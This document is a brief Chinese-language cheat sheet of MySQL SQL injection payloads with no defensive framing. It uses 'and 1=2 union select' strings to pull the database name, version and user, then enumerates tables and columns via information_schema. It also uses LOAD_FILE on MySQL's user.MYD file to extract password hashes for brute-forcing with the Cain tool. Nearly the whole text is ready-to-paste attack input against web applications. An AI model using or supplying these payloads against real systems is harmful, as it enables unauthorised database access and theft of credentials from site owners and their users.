一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,database(),5,version(),6,user(),7..../*

二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*

三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.....from information_schema.COLUMNS where TABLE_NAME=表的HEX limit 1,1/*

关于找不到ROOT密码的爆破:
通过LOAD_FILE(‘‘C:\..\MYSQL\DATA\MYSQL\USER.MYD‘‘)得到用户的HASH散列,之后用CAIN爆破....